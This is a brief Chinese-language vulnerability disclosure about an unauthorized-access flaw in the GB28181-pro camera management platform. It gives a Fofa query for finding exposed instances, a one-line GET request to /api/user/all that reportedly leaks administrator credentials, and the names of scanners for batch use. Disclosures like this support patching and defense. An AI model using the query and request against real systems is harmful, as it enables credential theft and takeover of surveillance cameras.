0x01 漏洞描述
GB28181是公共安全视频监控联网系统信息传输、交换、控制技术要求的标准。该标准主要定义了基于IP网络的音视频监控系统的整体架构,包括前端设备、存储设备、管理平台等组成部分,以及设备接入、流媒体传输、信令交互、存储管理、安全防护和平台管理等方面的要求。
GB28181-pro开源物联网摄像头管理平台api/user存在未授权访问漏洞,攻击者可利用漏洞获取当前系统管理员用户名及密码进行登录系统。
0x02 搜索语法
Fofa: body="国标28181"
0x03 漏洞详情
1、GB28181物联网摄像头管理平台
2.漏洞POC
GET /api/user/all
3.利用泄露的用户密码登录系统
0x04 批量
afrog
nuclei
